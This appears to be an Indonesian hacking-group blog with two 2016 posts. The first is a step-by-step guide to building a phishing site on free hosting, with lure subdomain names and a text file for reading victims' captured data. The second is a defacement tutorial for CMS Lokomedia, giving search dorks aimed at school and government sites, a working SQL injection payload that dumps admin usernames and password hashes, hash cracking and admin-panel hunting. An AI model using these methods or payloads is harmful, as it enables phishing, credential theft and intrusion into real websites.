Thursday, September 8, 2016

TUTOR PHISING LENGKAP

Tags
WELCOME ANONYMOUS CYBER TEAM !!!





Oke kali ini saya akan memposting tutorial membuat phising dari membuat hostinger sampai jadi.
Oke langsung aja , langkah-langkahnya :

LANGKAH 1
Langkah petama ini kita download alat pendukung membuat phising nya .
11.   Download script phising nya dulu di sini

22.   Kalau sudah di download ekstaks file scipt nya tadi 

  3.  Kalo sudah di ekstaks akan muncul folder seperti ini 

LANGKAH 2
Langkah ke 2 ini kita akan membuat hosting dan subdomain atau bisa di bilang membuat web phising nya .
1.       Buka google crome / mozila atau dll lalu searcing hostinger.com .

2.       Jika sudah di buka hostinger.com , akan muncul gambar seperti ini , lalu klik asia kalau anda tinggal di asia .

3.       Kalau sudah di klik asia lalu akan muncul gambar seperti ini , cari bendera indonesia kalau anda tinggal di indonesia.

4.       Kalau sudah klik asia dan indonesia akan muncul gambar seperti ini , lalu klik login .

5.       Setelah klik login akan muncul seperti ini , nanti ada saran masuk melalui facebook dan google , saran saya masuk melalui akun google saja .

6.       Setelah login melalui akun google , akan muncul gambar seperti ini , buatlah hosting yang gratis saja lalu klik order.

7.       Setelah di klik order, muncul gambar seperti ini lalu klik langsung “ LANJUT KE CHECKOUT “ yang ada di paling bawah .

8.       Nah muncul gambar seperti ini , lalu centang yang  ((1)“ saya setuju dengan “ , kalau sudah di centang lalu klik (2)  selanjut nya.

9.       Setelah mengikuti cara” di atas maka akun hosting anda sudah di buat tinggal buat domain dan menaruh file agar phising berlajan. Lalu kalian langsung klik beranda


10.   Setelah di klik beranda akan muncul gambar seperti ini , nah langsung klik setup.

11.   Setelah di klik setup , nah dari sini kita akan membuat domain untuk mendukung phising bisa di gunakan.
Langkah” isi domain nya
1.       klik Subdomain Gratis
2.       Nama subdomain : isi subdomain ini semenarik mungkin agar korban masuk ke perangkap phising kalian ( contoh : pulsaGratis.esy.es ) tidak di spasi [ NOTE : karna hostinger sudah banyak di guakan kadang” suka tidak bisa buat nama subdomain karna sudah di pakai orang lain coba nama subdomain nya di ganti )
3.       Pilih Lokasi Server : Klik Europe ( UK )
4.       Password : isi seterah kalian
Setelah di lakukan semua klik “ SETUP “



Nah langkah” membuat akun hosting dan subdomain sudah selesai , setelah ini kita akan masuk memasukan file yang di ekstaks ke dalam akun hosting / subdomain yang kita buat tadi dan mengedit file yang telah kita ekstaks tadi .


LANGSUNG AJA LANGKAH”NYA

NOTE: pada tahap memasukan file manajer tidak bisa terlalu lama karna akan terjadi server eror

[ Sebelum melanjutkan nya terlebih dahulu kita mengedit script phising yang sudah di ekstaks tadi , buka file phising yang sudah di ekstaks

Lalu klik yang bacaan next


Lalu akan muncul notepad seperti ini

Setelah muncul notepad , lalu hapus bacaan [ nabilahsinta.esy.es ] , lalu kalian ganti dengan nama hosting kalian [ kodokjungkir.esy.es ]

Setelah di rubah terus di save setelah di save yang kalian edit sudah selesai 

]

Kita lanjut ke tahap sebelum nya berikutnya

1.       Sehabis kalian memasukan nama subdomain , pilih server, password , dan klik setup , gambar selanjutnya akan muncul seperti ini . nah lalu klik hosting .

2.       Setelah klik hosting Nah lalu keluar gambar seperti ini , (1) klik subdomain kalian yang kalian buat , (2) setelah di klik akan muncul file” seperti berikut .
Klik kelola


3.       Setelah di klik kelola akan muncul gambar seperti di bawah

Lalu scroll ke bawah cari file namanya [ FILE MANAJER ]
Setelah di klik FILE MANAJER akan muncul seperti ini

4.       Setelah itu kalian klik public html

Tunggu sebentar lalu akan muncul file” seperti ini ketika klik file public html


5.       Setelah itu kalian klik upload


6.       Setelah menekan upload  , nah di sini file” phising tadi di masukan

7.       Untuk memasukan file” tersebut klik choose file yang di sebelah kiri , memasukan filenya acak tidak papa [ FILE YANG DI MASUKAN KE CHOOSE FILE = “ Akuhebat , Index , Next “ , yang file hacked tidak perlu di masukan ]


8.       Setelah memasukan file” ke dalam upload public html setelah itu klik ceklis warna hijau di atas sebelah tanda back warna biru

9.       Setelah di  klik ceklis warna hijau akan muncul gambar seperti ini , lalu klik tanda back biru yang di atas


10.   Setelah di klik tanda back biru file yang kita upload di choose file akan muncul di public html

11.   Dan BOOM phising kalian sudah jadi kalau mau cek file sudah jadi atau belum tinggal searcing  contoh ; kodokjungkir.esy.es




Note: cara agar melihat siapa yang sudah kena perangkap phising kita bisa cek kaya gini kodokjungkir.esy.es/akuhebat.txt


Sekian tutorial phising dari saya
Thanks For Reading Ya Guys :)

FOLLOW INSTAGRAM @anon_cyber_team :)
                                     
Bila ada kekurangan atau file bermasalah silahkan Komentar / Hub INSTAGRAM kami 

Penulis 
instagram : @ilham_syahfitra


Monday, September 5, 2016

DEFACE DENGAN CMS LOKOMEDIA !!!

Tags
WELCOME ANONYMOUS !!!

Pada kesempatan kali ini kami akan membahas bagimana cara deface menggunakan CMS Lokomedia !!! 

  Sekedar pengetahuan !!! Cms Lokomedia adalah CMS ( Content System Management ) Buatan karya anak bangsa, Kebanyakan orang menggunakan CMS ini untuk pribadi atau sekolahan, Jadi mohon untuk tidak merusak web tersebut. Tutorial ini cukup untuk di jadikan bahan pembelajaran terimakasih.


Hello Anonymous !!!

Langkah pertama untuk melakukan deface adalah mengenali dork bug di lokomedia, Berikut kumpulan dork yang telah kami siapkan !!!

inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-1-visimisi.html
inurl:statis-1-tujuan.html 

NB : Kalian bisa kreasikan dork di atas sesuai kratifitas kalian, contohnya dengan menambahkan site:.go.id / net / sch.id / id . Contoh Dork ( site:id statis-1-visimisi.html )

Untuk Exploit CMS Lokomedia adalah
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Untuk Exploit apa perlu saya contohkan ?? Okeh baiklah
Contoh Web Target anda adalah www.ganteng.sch.id/statis-1-profil.html 
Silahkan masukan Exploit di belakang angka . Jadi Seperti ini  
 www.ganteng.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html 
Jadi seperti itu hasil web yang telah di beri Exploit, Tapi bila anda menemukan Web yang memliki link seperti www.ganteng.sch,id/statis-1/profil.html Tetap anda taruh Exploitnya di belakang angka , jadi seperti ini  
www.ganteng.sch,id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+/profil.html 
Apa sejauh ini kamu udah paham sayang ?? eaaa :v
Langkah pertama taruh dork di Google / Mesin pencari lainya yang sering kamu pakai,
Cari Target sesuai hati kalian :)
Anggap lah kalian sudah menemukan target www.tamvan.id/statis-1-profil.html
Setelah mendapatkan Web target silahkan masukan exploit di belakang angkanya jadi seperti ini www.tamvan.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Selanjutnya Tinggal kalian klik Enter, Maka akan muncul username dan password di atas judul websitenya ,

Setelah muncul tulisan username dan password di atas judul website, maka tinggal kalian tekan CTRL+U untuk melihat username dan password dengan jelas :D 
Ingat password masih berupa MD5 , Kalian bisa hash password di link ini http://md5online.org/ 
Selanjutnya adalah cari login adminya dengan cara menambahkan tulisan admin , Contoh
www.poli.go.id/admin
www.poli.id/adminweb
Kalo tidak bisa menemukan admin web, berati sudah di rubah oleh pemilik webnya,
SARAN !!! SEBELUM EXPLOIT LEBIH BAIK CARI ADMIN WEB TERLEBIH DAHULU !!!!
Sekian Tutorial Kali ini !!!
Thanks For Reading Guys !!!
Any Question ? Ask Me On Instagram @anon_cyber_team
Tutor By MR.TENWAP
Edu-Secure